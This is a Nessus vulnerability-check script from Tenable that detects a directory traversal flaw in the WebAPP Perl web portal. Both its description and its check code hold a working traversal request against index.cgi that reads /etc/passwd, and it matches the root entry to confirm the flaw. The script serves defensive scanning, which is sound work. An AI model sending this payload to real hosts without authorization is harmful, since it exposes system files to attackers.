#
# (C) Tenable Network Security
#

if(description)
{
 script_id(14365);
 script_bugtraq_id(11028);
 script_version("$Revision: 1.2 $");
 
 name["english"] = "WebAPP Directory Traversal";

 script_name(english:name["english"]);
 
 desc["english"] = "
The remote host is running WebAPP, an open-source web portal application
written in perl.

There is a flaw in the remote version of this software which may allow an
attacker to read arbitrary files on the remote host with the privileges
of the web server process (httpd or root) by making a request like :

	 GET /cgi-bin/index.cgi?action=topics&viewcat=../../../../etc/passwd

Solution : Upgrade to the latest version of this software
Risk factor: Medium";

 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for the presence of a directory traversal bug in WebAPP";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#


include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);
function check(loc)
{
 req = http_get(item:string(loc, "/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd"), port:port);

 r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( r == NULL )exit(0);
 if( egrep(pattern:"root:.*:0:[01]:", string:r) ) 
 {
 	security_warning(port);
	exit(0);
 }
}

foreach dir (cgi_dirs())
{
 check(loc:dir);
}

